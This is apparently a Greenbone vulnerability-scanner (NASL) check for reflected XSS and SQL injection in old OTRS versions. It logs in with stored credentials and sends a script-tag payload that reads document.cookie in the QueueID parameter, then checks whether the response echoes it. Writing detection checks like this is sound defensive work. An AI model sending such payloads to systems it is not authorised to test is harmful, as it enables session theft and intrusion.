
OTRS 1.0.0 - 1.3.2, 2.0.0 - 2.0.3 Multiple Input Validation Vulnerabilities

2013-09-2500:00:00
Copyright (C) 2013 Greenbone AG


7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.009 Low

EPSS

Percentile

82.4%

OTRS (Open Ticket Request System) is prone to multiple input
validation vulnerabilities.

# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

# CPE used to look up the detected OTRS install (port and location) in the KB.
CPE = "cpe:/a:otrs:otrs";

# Registration pass: when the scanner loads the script with `description`
# set, only the metadata below is registered and the script exits before
# any network activity.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.803935");
  script_version("2023-10-27T05:05:28+0000");
  script_cve_id("CVE-2005-3893", "CVE-2005-3894", "CVE-2005-3895");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
  script_tag(name:"creation_date", value:"2013-09-25 15:32:50 +0530 (Wed, 25 Sep 2013)");
  script_name("OTRS 1.0.0 - 1.3.2, 2.0.0 - 2.0.3 Multiple Input Validation Vulnerabilities");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to steal the
  victim's cookie-based authentication credentials or execute arbitrary SQL commands and bypass
  authentication.");

  # Only the reflected-XSS issue (QueueID) is actually tested below; the SQL
  # injection CVEs are covered by the version range in "affected", not by a probe.
  script_tag(name:"vuldetect", value:"Tries to login with provided credentials, sends a crafted HTTP
  GET request and checks the response.");

  script_tag(name:"insight", value:"Multiple errors exist in the application which fails to validate
  below user-supplied input's properly:

  - For XSS attack (1) QueueID parameter and (2) Action parameters (3) AttachmentDownloadType.

  - For SQL attack (1) user parameter (2) TicketID and (3) ArticleID parameters");

  script_tag(name:"solution", value:"Update to version 1.3.3, 2.0.4 or later.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"summary", value:"OTRS (Open Ticket Request System) is prone to multiple input
  validation vulnerabilities.");

  script_tag(name:"affected", value:"OTRS (Open Ticket Request System) version 1.0.0 through 1.3.2
  and 2.0.0 through 2.0.3.");

  script_xref(name:"URL", value:"http://secunia.com/advisories/17685");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/15537");
  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/34164");
  script_xref(name:"URL", value:"http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2005-01/");
  # ACT_ATTACK: the check sends an authenticated request carrying a test
  # payload to the target, so it is scheduled in the attack phase and should
  # only be enabled where active checks are acceptable.
  script_category(ACT_ATTACK);
  # The result is judged from the live HTTP response, not from a version string.
  script_tag(name:"qod_type", value:"remote_analysis");
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2013 Greenbone AG");
  # secpod_otrs_detect.nasl provides the OTRS/installed key; logins.nasl
  # provides the web credentials read from the KB at runtime.
  script_dependencies("logins.nasl", "secpod_otrs_detect.nasl");
  script_require_ports("Services/www", 80);
  # Note: only http/login is mandatory; http/password is not, so the login
  # below may be attempted with an empty password.
  script_mandatory_keys("OTRS/installed", "http/login");
  exit(0);
}

include("url_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

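# Log in to OTRS with the web credentials stored in the KB and return the
# value of the Session cookie the application sets on success.
#
# location: base path of the OTRS install ("" when served from the web root)
# otrsport: web port the detection script found OTRS on
# otrshost: value to send in the HTTP Host header (and in the Referer)
#
# Returns the session id captured from "Set-Cookie: Session=..." or NULL
# when no response was received or no Session cookie was set. Returning
# NULL (instead of exiting the whole script from inside the helper) keeps
# the decision with the caller, whose `if(cookie)` check otherwise could
# never be false.
function get_otrs_login_cookie(location, otrsport, otrshost) {
  local_var url, username, password, payload, req, buf, cookie;

  url = location + "/index.pl?";
  # http/password is not a mandatory key, so this may legitimately be empty;
  # both values are URL-encoded before being placed in the form body.
  username = urlencode(str:get_kb_item("http/login"));
  password = urlencode(str:get_kb_item("http/password"));
  payload = "Action=Login&RequestedURL=&Lang=en&TimeOffset=-330&User=" + username + "&Password=" + password;

  # Plain HTTP/1.0 form POST; the Referer is built with a fixed http://
  # scheme regardless of the transport actually in use.
  req = string("POST ",url," HTTP/1.0\r\n",
               "Host: ",otrshost," \r\n",
               "Content-Type: application/x-www-form-urlencoded\r\n",
               "Referer: http://",otrshost,location,"/index.pl\r\n",
               "Connection: keep-alive\r\n",
               "Content-Length: ", strlen(payload),"\r\n\r\n",
               payload);

  buf = http_keepalive_send_recv(port:otrsport, data:req);
  if(!buf)
    return NULL;

  # OTRS session ids are lower-case alphanumerics; the capture group is the
  # value the caller sends back as "Cookie: Session=<id>".
  cookie = eregmatch(pattern:"Set-Cookie: Session=([a-z0-9]+)", string:buf);
  if(!cookie[1])
    return NULL;

  return cookie[1];
}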

# Active check: locate the detected OTRS install, obtain an authenticated
# session, then request index.pl with a marker string in QueueID and see
# whether the page reflects it unencoded.
port = get_app_port(cpe:CPE);
if(!port)
  exit(0);

loca = get_app_location(cpe:CPE, port:port);
if(!loca)
  exit(0);

# Avoid a double slash when OTRS lives at the web root.
if(loca == "/")
  loca = "";

host = http_host_name(port:port);
cookie = get_otrs_login_cookie(location:loca, otrsport:port, otrshost:host);

# Without an authenticated session the reflected page cannot be checked.
if(!cookie)
  exit(0);

url = loca + '/index.pl?QueueID="><script>alert(document.cookie)</script>"';
req = 'GET ' + url + ' HTTP/1.1\r\n' +
      'Host: ' + host + ' \r\n' +
      'Connection: keep-alive\r\n' +
      'Cookie: Session=' + cookie + '\r\n\r\n';
res = http_send_recv(port:port, data:req);

# Vulnerable only if the response is a 200, echoes the marker verbatim, and
# shows "Logout" (i.e. the page was rendered for the logged-in session rather
# than a login form that happens to repeat the query string).
reflected = ereg(pattern:"^HTTP/1\.[01] 200", string:res) &&
            "<script>alert(document.cookie)</script>" >< res &&
            "Logout" >< res;

if(reflected) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

# Session obtained but marker not reflected: explicitly "not vulnerable".
exit(99);
